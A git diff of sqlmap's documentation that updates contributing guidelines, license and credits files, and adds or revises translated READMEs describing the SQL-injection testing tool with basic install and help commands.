issues to make sure the issue has not come up before. Also, check the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) for anything relevant. +* Make sure you can reproduce the bug with the latest development version of sqlmap. +* Your report should give detailed instructions on how to reproduce the problem. If sqlmap raises an unhandled exception, the entire traceback is needed. Details of the unexpected behaviour are welcome too. A small test case (just a few lines) is ideal. +* If you are making an enhancement request, lay out the rationale for the feature you are requesting. *Why would this feature be useful?* + +## Submitting code changes + +All code contributions are greatly appreciated. First off, clone the [Git repository](https://github.com/sqlmapproject/sqlmap), read the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) carefully, go through the code yourself and [drop us an email](mailto:dev@sqlmap.org) if you are having a hard time grasping its structure and meaning. We apologize for not commenting the code enough - you could take a chance to read it through and [improve it](https://github.com/sqlmapproject/sqlmap/issues/37). + +Our preferred method of patch submission is via a Git [pull request](https://help.github.com/articles/using-pull-requests). +Many [people](https://raw.github.com/sqlmapproject/sqlmap/master/doc/THANKS.md) have contributed in different ways to the sqlmap development. **You** can be the next! 
+ +### Guidelines + +In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions: + +* Each patch should make one logical change. +* Wrap code to 76 columns when possible. +* Avoid tabbing, use four blank spaces instead. +* Before you put time into a non-trivial patch, it is worth discussing it privately by [email](mailto:dev@sqlmap.org). +* Do not change style on numerous files in one single pull request, we can [discuss](mailto:dev@sqlmap.org) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected. +* Make changes on less than five files per single pull request - there is rarely a good reason to have more than five files changed on one pull request, as this dramatically increases the review time required to land (commit) any of those pull requests. +* Style that is too different from main branch will be ''adapted'' by the developers side. +* Do not touch anything inside `thirdparty/` and `extra/` folders. + +### Licensing + +By submitting code contributions to the sqlmap developers or via Git pull request, checking them into the sqlmap source code repository, it is understood (unless you specify otherwise) that you are offering the sqlmap copyright holders the unlimited, non-exclusive right to reuse, modify, and relicense the code. This is important because the inability to relicense code has caused devastating problems for other software projects (such as KDE and NASM). If you wish to specify special license conditions of your contributions, just say so when you send them. diff --git a/doc/COPYING b/doc/COPYING index 880d8774b..8854b1339 100644 --- a/doc/COPYING +++ b/doc/COPYING @@ -1,7 +1,7 @@ COPYING -- Describes the terms under which sqlmap is distributed. A copy of the GNU General Public License (GPL) is appended to this file. -sqlmap is (C) 2006-2015 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar. +sqlmap is (C) 2006-2017 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar. This program is free software; you may redistribute and/or modify it under the terms of the GNU General Public License as published by the Free @@ -46,14 +46,14 @@ to know exactly what a program is going to do before they run it. Source code also allows you to fix bugs and add new features. You are highly encouraged to send your changes to dev@sqlmap.org for possible incorporation into the main distribution. By sending these changes to the -sqlmap developers, to the mailing lists, or via Git pull request, checking -them into the sqlmap source code repository, it is understood (unless you -specify otherwise) that you are offering the sqlmap project the unlimited, -non-exclusive right to reuse, modify, and relicense the code. sqlmap will -always be available Open Source, but this is important because the -inability to relicense code has caused devastating problems for other Free -Software projects (such as KDE and NASM). If you wish to specify special -license conditions of your contributions, just say so when you send them. +sqlmap developers or via Git pull request, checking them into the sqlmap +source code repository, it is understood (unless you specify otherwise) +that you are offering the sqlmap project the unlimited, non-exclusive +right to reuse, modify, and relicense the code. 
sqlmap will always be +available Open Source, but this is important because the inability to +relicense code has caused devastating problems for other Free Software +projects (such as KDE and NASM). If you wish to specify special license +conditions of your contributions, just say so when you send them. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of @@ -361,7 +361,6 @@ This license does not apply to the following components: * The MultipartPost library located under thirdparty/multipartpost/. * The Odict library located under thirdparty/odict/. * The Oset library located under thirdparty/oset/. -* The PageRank library located under thirdparty/pagerank/. * The PrettyPrint library located under thirdparty/prettyprint/. * The PyDes library located under thirdparty/pydes/. * The SocksiPy library located under thirdparty/socks/. diff --git a/doc/FAQ.pdf b/doc/FAQ.pdf index d0a91bdb3..0a17b98f3 100644 Binary files a/doc/FAQ.pdf and b/doc/FAQ.pdf differ diff --git a/doc/README.pdf b/doc/README.pdf index a3ddc647a..fd5e4f72a 100644 Binary files a/doc/README.pdf and b/doc/README.pdf differ diff --git a/doc/THANKS.md b/doc/THANKS.md index 931ab73bc..6e9f85819 100644 --- a/doc/THANKS.md +++ b/doc/THANKS.md @@ -139,7 +139,7 @@ Jim Forster, * for reporting a bug Rong-En Fan, -* for commiting the sqlmap 0.5 port to the official FreeBSD project repository +* for committing the sqlmap 0.5 port to the official FreeBSD project repository Giorgio Fedon, * for suggesting a speed improvement for bisection algorithm @@ -173,6 +173,9 @@ Ivan Giacomelli, * for suggesting a minor enhancement * for reviewing the documentation +Dimitris Giannitsaros, +* for contributing a REST-JSON API client + Nico Golde, * for reporting a couple of bugs @@ -559,7 +562,7 @@ Kazim Bugra Tombul, * for reporting a minor bug Efrain Torres, -* for helping out to improve the Metasploit Framework sqlmap auxiliary module and for commiting it on the Metasploit official subversion repository +* for helping out to improve the Metasploit Framework sqlmap auxiliary module and for committing it on the Metasploit official subversion repository * for his great Metasploit WMAP Framework Sandro Tosi, diff --git a/doc/THIRD-PARTY.md b/doc/THIRD-PARTY.md index f2479b31a..2bf01b6ea 100644 --- a/doc/THIRD-PARTY.md +++ b/doc/THIRD-PARTY.md @@ -12,7 +12,7 @@ This file lists bundled packages and their associated licensing terms. Copyright (C) 2005, Zope Corporation. Copyright (C) 1998-2000, Gisle Aas. * The Colorama library located under thirdparty/colorama/. - Copyright (C) 2010, Jonathan Hartley. + Copyright (C) 2013, Jonathan Hartley. * The Fcrypt library located under thirdparty/fcrypt/. Copyright (C) 2000, 2001, 2004 Carey Evans. * The Odict library located under thirdparty/odict/. @@ -281,8 +281,6 @@ be bound by the terms and conditions of this License Agreement. * The bottle web framework library located under thirdparty/bottle/. Copyright (C) 2012, Marcel Hellkamp. -* The PageRank library located under thirdparty/pagerank/. - Copyright (C) 2010, Corey Goldberg. * The Termcolor library located under thirdparty/termcolor/. Copyright (C) 2008-2011, Volvox Development Team. @@ -312,3 +310,5 @@ WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. * The PyDes library located under thirdparty/pydes/. Copyleft 2009, Todd Whiteman. +* The win_inet_pton library located under thirdparty/wininetpton/. + Copyleft 2014, Ryan Vennell. 
diff --git a/doc/translations/README-bg-BG.md b/doc/translations/README-bg-BG.md new file mode 100644 index 000000000..80daf852b --- /dev/null +++ b/doc/translations/README-bg-BG.md @@ -0,0 +1,50 @@ +# sqlmap + +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![Лиценз](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap e инструмент за тестване и проникване, с отворен код, който автоматизира процеса на откриване и използване на недостатъците на SQL база данните чрез SQL инжекция, която ги взима от сървъра. Снабден е с мощен детектор, множество специални функции за най-добрия тестер и широк спектър от функции, които могат да се използват за множество цели - извличане на данни от базата данни, достъп до основната файлова система и изпълняване на команди на операционната система. + +Демо снимки +---- + +![Снимка на екрана](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Можете да посетите [колекцията от снимки на екрана](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), показващи някои функции, качени на wiki. + +Инсталиране +---- + +Може да изтеглине най-новите tar архиви като кликнете [тук](https://github.com/sqlmapproject/sqlmap/tarball/master) или най-новите zip архиви като кликнете [тук](https://github.com/sqlmapproject/sqlmap/zipball/master). + +За предпочитане е да изтеглите sqlmap като клонирате [Git](https://github.com/sqlmapproject/sqlmap) хранилището: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap работи самостоятелно с [Python](http://www.python.org/download/) версия **2.6.x** и **2.7.x** на всички платформи. + +Използване +---- + +За да получите списък с основните опции използвайте: + + python sqlmap.py -h + +За да получите списък с всички опции използвайте: + + python sqlmap.py -hh + +Може да намерите пример за използване на sqlmap [тук](https://asciinema.org/a/46601). +За да разберете възможностите на sqlmap, списък на поддържаните функции и описание на всички опции, заедно с примери, се препоръчва да се разгледа [упътването](https://github.com/sqlmapproject/sqlmap/wiki/Usage). 
+ +Връзки +---- + +* Начална страница: http://sqlmap.org +* Изтегляне: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS емисия: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Проследяване на проблеми и въпроси: https://github.com/sqlmapproject/sqlmap/issues +* Упътване: https://github.com/sqlmapproject/sqlmap/wiki +* Често задавани въпроси (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* Twitter: [@sqlmap](https://twitter.com/sqlmap) +* Демо: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* Снимки на екрана: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-es-MX.md b/doc/translations/README-es-MX.md new file mode 100644 index 000000000..d81139c84 --- /dev/null +++ b/doc/translations/README-es-MX.md @@ -0,0 +1,49 @@ +# sqlmap + +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap es una herramienta para pruebas de penetración "penetration testing" de software libre que automatiza el proceso de detección y explotación de fallos mediante inyección de SQL además de tomar el control de servidores de bases de datos. Contiene un poderoso motor de detección, así como muchas de las funcionalidades escenciales para el "pentester" y una amplia gama de opciones desde la recopilación de información para identificar el objetivo conocido como "fingerprinting" mediante la extracción de información de la base de datos, hasta el acceso al sistema de archivos subyacente para ejecutar comandos en el sistema operativo a través de conexiones alternativas conocidas como "Out-of-band". + +Capturas de Pantalla +--- +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Visita la [colección de capturas de pantalla](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) que demuestra algunas de las características en la documentación(wiki). + +Instalación +--- + +Se puede descargar el "tarball" más actual haciendo clic [aquí](https://github.com/sqlmapproject/sqlmap/tarball/master) o el "zipball" [aquí](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Preferentemente, se puede descargar sqlmap clonando el repositorio [Git](https://github.com/sqlmapproject/sqlmap): + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap funciona con las siguientes versiones de [Python](http://www.python.org/download/) ** 2.6.x** y ** 2.7.x** en cualquier plataforma. + +Uso +--- + +Para obtener una lista de opciones básicas: + + python sqlmap.py -h + +Para obtener una lista de todas las opciones: + + python sqlmap.py -hh + +Se puede encontrar una muestra de su funcionamiento [aquí](https://asciinema.org/a/46601). +Para obtener una visión general de las capacidades de sqlmap, así como un listado funciones soportadas y descripción de todas las opciones y modificadores, junto con ejemplos, se recomienda consultar el [manual de usuario](https://github.com/sqlmapproject/sqlmap/wiki/Usage). 
+ +Enlaces +--- + +* Página principal: http://sqlmap.org +* Descargar: [. tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) o [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Fuente de Cambios "Commit RSS feed": https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Seguimiento de problemas "Issue tracker": https://github.com/sqlmapproject/sqlmap/issues +* Manual de usuario: https://github.com/sqlmapproject/sqlmap/wiki +* Preguntas frecuentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* Twitter: [@sqlmap](https://twitter.com/sqlmap) +* Demostraciones: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* Imágenes: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-fr-FR.md b/doc/translations/README-fr-FR.md new file mode 100644 index 000000000..e1cbec97d --- /dev/null +++ b/doc/translations/README-fr-FR.md @@ -0,0 +1,49 @@ +# sqlmap + +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +**sqlmap** est un outil Open Source de test d'intrusion. Cet outil permet d'automatiser le processus de détection et d'exploitation des failles d'injection SQL afin de prendre le contrôle des serveurs de base de données. __sqlmap__ dispose d'un puissant moteur de détection utilisant les techniques les plus récentes et les plus dévastatrices de tests d'intrusion comme L'Injection SQL, qui permet d'accéder à la base de données, au système de fichiers sous-jacent et permet aussi l'exécution des commandes sur le système d'exploitation. + +---- + +![Les Captures d'écran](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Les captures d'écran disponible [ici](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) démontrent des fonctionnalités de __sqlmap__. + +Installation +---- + +Vous pouvez télécharger le plus récent fichier tarball en cliquant [ici](https://github.com/sqlmapproject/sqlmap/tarball/master). Vous pouvez aussi télécharger le plus récent archive zip [ici](https://github.com/sqlmapproject/sqlmap/zipball/master). + +De préférence, télécharger __sqlmap__ en le [clonant](https://github.com/sqlmapproject/sqlmap): + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap fonctionne sur n'importe quel système d'exploitation avec la version **2.6.x** et **2.7.x** de [Python](http://www.python.org/download/) + +Usage +---- + +Pour afficher une liste des fonctions de bases et des commutateurs (switches), tapez: + + python sqlmap.py -h + +Pour afficher une liste complète des options et des commutateurs (switches), tapez: + + python sqlmap.py -hh + +Vous pouvez regarder un vidéo [ici](https://asciinema.org/a/46601) pour plus d'exemples. +Pour obtenir un aperçu des ressources de __sqlmap__, une liste des fonctionnalités prises en charge et la description de toutes les options, ainsi que des exemples , nous vous recommandons de consulter [le wiki](https://github.com/sqlmapproject/sqlmap/wiki/Usage). 
+ +Liens +---- + +* Page d'acceuil: http://sqlmap.org +* Téléchargement: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ou [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues +* Manuel de l'utilisateur: https://github.com/sqlmapproject/sqlmap/wiki +* Foire aux questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* Twitter: [@sqlmap](https://twitter.com/sqlmap) +* Démonstrations: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* Les captures d'écran: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-gr-GR.md b/doc/translations/README-gr-GR.md index 8b09ba653..33beca420 100644 --- a/doc/translations/README-gr-GR.md +++ b/doc/translations/README-gr-GR.md @@ -1,6 +1,6 @@ -sqlmap -== +# sqlmap +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) Το sqlmap είναι πρόγραμμα ανοιχτού κώδικα, που αυτοματοποιεί την εύρεση και εκμετάλλευση ευπαθειών τύπου SQL Injection σε βάσεις δεδομένων. Έρχεται με μια δυνατή μηχανή αναγνώρισης ευπαθειών, πολλά εξειδικευμένα χαρακτηριστικά για τον απόλυτο penetration tester όπως και με ένα μεγάλο εύρος επιλογών αρχίζοντας από την αναγνώριση της βάσης δεδομένων, κατέβασμα δεδομένων της βάσης, μέχρι και πρόσβαση στο βαθύτερο σύστημα αρχείων και εκτέλεση εντολών στο απευθείας στο λειτουργικό μέσω εκτός ζώνης συνδέσεων. @@ -18,7 +18,7 @@ sqlmap Κατά προτίμηση, μπορείτε να κατεβάσετε το sqlmap κάνοντας κλώνο το [Git](https://github.com/sqlmapproject/sqlmap) αποθετήριο: - git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev Το sqlmap λειτουργεί χωρίς περαιτέρω κόπο με την [Python](http://www.python.org/download/) έκδοσης **2.6.x** και **2.7.x** σε όποια πλατφόρμα. @@ -33,8 +33,8 @@ sqlmap python sqlmap.py -hh -Μπορείτε να δείτε ένα δείγμα λειτουργίας του προγράμματος [εδώ](https://gist.github.com/stamparm/5335217). -Για μια γενικότερη άποψη των δυνατοτήτων του sqlmap, μια λίστα των υποστηριζόμενων χαρακτηριστικών και περιγραφή για όλες τις επιλογές, μαζί με παραδείγματα, καλείστε να συμβουλευτείτε το [εγχειρίδιο χρήστη](https://github.com/sqlmapproject/sqlmap/wiki). +Μπορείτε να δείτε ένα δείγμα λειτουργίας του προγράμματος [εδώ](https://asciinema.org/a/46601). +Για μια γενικότερη άποψη των δυνατοτήτων του sqlmap, μια λίστα των υποστηριζόμενων χαρακτηριστικών και περιγραφή για όλες τις επιλογές, μαζί με παραδείγματα, καλείστε να συμβουλευτείτε το [εγχειρίδιο χρήστη](https://github.com/sqlmapproject/sqlmap/wiki/Usage). 
Σύνδεσμοι ---- @@ -45,9 +45,6 @@ sqlmap * Προβλήματα: https://github.com/sqlmapproject/sqlmap/issues * Εγχειρίδιο Χρήστη: https://github.com/sqlmapproject/sqlmap/wiki * Συχνές Ερωτήσεις (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Εγγραφή σε Mailing list: https://lists.sourceforge.net/lists/listinfo/sqlmap-users -* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap -* Mailing list αρχείο: http://news.gmane.org/gmane.comp.security.sqlmap * Twitter: [@sqlmap](https://twitter.com/sqlmap) * Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) * Εικόνες: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-hr-HR.md b/doc/translations/README-hr-HR.md index 69e2d531d..85fe1193c 100644 --- a/doc/translations/README-hr-HR.md +++ b/doc/translations/README-hr-HR.md @@ -1,6 +1,6 @@ -sqlmap -== +# sqlmap +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) sqlmap je alat namijenjen za penetracijsko testiranje koji automatizira proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije te preuzimanje poslužitelja baze podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko dohvaćanja podataka iz baze, do pristupa zahvaćenom datotečnom sustavu i izvršavanja komandi na operacijskom sustavu korištenjem tzv. "out-of-band" veza. @@ -18,7 +18,7 @@ Možete preuzeti zadnji tarball klikom [ovdje](https://github.com/sqlmapproject/ Po mogućnosti, možete preuzeti sqlmap kloniranjem [Git](https://github.com/sqlmapproject/sqlmap) repozitorija: - git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev sqlmap radi bez posebnih zahtjeva korištenjem [Python](http://www.python.org/download/) verzije **2.6.x** i/ili **2.7.x** na bilo kojoj platformi. @@ -33,8 +33,8 @@ Kako biste dobili listu svih opcija i prekidača koristite: python sqlmap.py -hh -Možete pronaći primjer izvršavanja [ovdje](https://gist.github.com/stamparm/5335217). -Kako biste dobili pregled mogućnosti sqlmap-a, liste podržanih značajki te opis svih opcija i prekidača, zajedno s primjerima, preporučen je uvid u [korisnički priručnik](https://github.com/sqlmapproject/sqlmap/wiki). +Možete pronaći primjer izvršavanja [ovdje](https://asciinema.org/a/46601). +Kako biste dobili pregled mogućnosti sqlmap-a, liste podržanih značajki te opis svih opcija i prekidača, zajedno s primjerima, preporučen je uvid u [korisnički priručnik](https://github.com/sqlmapproject/sqlmap/wiki/Usage). 
Poveznice ---- @@ -45,9 +45,6 @@ Poveznice * Prijava problema: https://github.com/sqlmapproject/sqlmap/issues * Korisnički priručnik: https://github.com/sqlmapproject/sqlmap/wiki * Najčešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Pretplata na mailing listu: https://lists.sourceforge.net/lists/listinfo/sqlmap-users -* RSS feed mailing liste: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap -* Arhiva mailing liste: http://news.gmane.org/gmane.comp.security.sqlmap * Twitter: [@sqlmap](https://twitter.com/sqlmap) * Demo: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) * Slike zaslona: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-id-ID.md b/doc/translations/README-id-ID.md index e2957b119..4f8ec4284 100644 --- a/doc/translations/README-id-ID.md +++ b/doc/translations/README-id-ID.md @@ -1,5 +1,6 @@ -sqlmap -== +# sqlmap + +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) sqlmap merupakan alat _(tool)_ bantu _open source_ dalam melakukan tes penetrasi yang mengotomasi proses deteksi dan eksploitasi kelemahan _SQL injection_ dan pengambil-alihan server basisdata. sqlmap dilengkapi dengan pendeteksi canggih, fitur-fitur hanal bagi _penetration tester_, beragam cara untuk mendeteksi basisdata, hingga mengakses _file system_ dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_. @@ -18,7 +19,7 @@ Anda dapat mengunduh tarball versi terbaru [di sini] Sebagai alternatif, Anda dapat mengunduh sqlmap dengan men-_clone_ repositori [Git](https://github.com/sqlmapproject/sqlmap): - git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev sqlmap berfungsi langsung pada [Python](http://www.python.org/download/) versi **2.6.x** dan **2.7.x** pada platform apapun. @@ -33,8 +34,8 @@ Untuk mendapatkan daftar opsi lanjut gunakan: python sqlmap.py -hh -Anda dapat mendapatkan contoh penggunaan [di sini](https://gist.github.com/stamparm/5335217). -Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya, Anda disarankan untuk membaca [manual pengguna](https://github.com/sqlmapproject/sqlmap/wiki). +Anda dapat mendapatkan contoh penggunaan [di sini](https://asciinema.org/a/46601). +Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya, Anda disarankan untuk membaca [Panduan Pengguna](https://github.com/sqlmapproject/sqlmap/wiki/Usage). 
Tautan ---- @@ -45,9 +46,6 @@ Tautan * Issue tracker: https://github.com/sqlmapproject/sqlmap/issues * Wiki Manual Penggunaan: https://github.com/sqlmapproject/sqlmap/wiki * Pertanyaan yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Berlangganan milis: https://lists.sourceforge.net/lists/listinfo/sqlmap-users -* RSS feed dari milis: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap -* Arsip milis: http://news.gmane.org/gmane.comp.security.sqlmap * Twitter: [@sqlmap](https://twitter.com/sqlmap) * Video Demo [#1](http://www.youtube.com/user/inquisb/videos) dan [#2](http://www.youtube.com/user/stamparm/videos) * Tangkapan Layar: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-it-IT.md b/doc/translations/README-it-IT.md new file mode 100644 index 000000000..c9be5355c --- /dev/null +++ b/doc/translations/README-it-IT.md @@ -0,0 +1,50 @@ +# sqlmap + +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap è uno strumento open source per il penetration testing. Il suo scopo è quello di rendere automatico il processo di scoperta ed exploit di vulnerabilità di tipo SQL injection al fine di compromettere database online. Dispone di un potente motore per la ricerca di vulnerabilità, molti strumenti di nicchia anche per il più esperto penetration tester ed un'ampia gamma di controlli che vanno dal fingerprinting di database allo scaricamento di dati, fino all'accesso al file system sottostante e l'esecuzione di comandi nel sistema operativo attraverso connessioni out-of-band. + +Screenshot +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Nella wiki puoi visitare [l'elenco di screenshot](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) che mostrano il funzionamento di alcune delle funzionalità del programma. + +Installazione +---- + +Puoi scaricare l'ultima tarball cliccando [qui](https://github.com/sqlmapproject/sqlmap/tarball/master) oppure l'ultima zipball cliccando [qui](https://github.com/sqlmapproject/sqlmap/zipball/master). + +La cosa migliore sarebbe però scaricare sqlmap clonando la repository [Git](https://github.com/sqlmapproject/sqlmap): + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap è in grado di funzionare con le versioni **2.6.x** e **2.7.x** di [Python](http://www.python.org/download/) su ogni piattaforma. + +Utilizzo +---- + +Per una lista delle opzioni e dei controlli di base: + + python sqlmap.py -h + +Per una lista di tutte le opzioni e di tutti i controlli: + + python sqlmap.py -hh + +Puoi trovare un esempio di esecuzione [qui](https://asciinema.org/a/46601). +Per una panoramica delle capacità di sqlmap, una lista delle sue funzionalità e la descrizione di tutte le sue opzioni e controlli, insieme ad un gran numero di esempi, siete pregati di visitare lo [user's manual](https://github.com/sqlmapproject/sqlmap/wiki/Usage) (disponibile solo in inglese). 
+ +Link +---- + +* Sito: http://sqlmap.org +* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS feed dei commit: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues +* Manuale dell'utente: https://github.com/sqlmapproject/sqlmap/wiki +* Domande più frequenti (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* Twitter: [@sqlmap](https://twitter.com/sqlmap) +* Dimostrazioni: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* Screenshot: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-ja-JP.md b/doc/translations/README-ja-JP.md new file mode 100644 index 000000000..8982d303d --- /dev/null +++ b/doc/translations/README-ja-JP.md @@ -0,0 +1,51 @@ +# sqlmap + +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmapはオープンソースのペネトレーションテスティングツールです。SQLインジェクションの脆弱性の検出、活用、そしてデータベースサーバ奪取のプロセスを自動化します。 +強力な検出エンジン、ペネトレーションテスターのための多くのニッチ機能、持続的なデータベースのフィンガープリンティングから、データベースのデータ取得やアウトオブバンド接続を介したオペレーティング・システム上でのコマンド実行、ファイルシステムへのアクセスなどの広範囲に及ぶスイッチを提供します。 + +スクリーンショット +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +wikiに載っているいくつかの機能のデモをスクリーンショットで見ることができます。 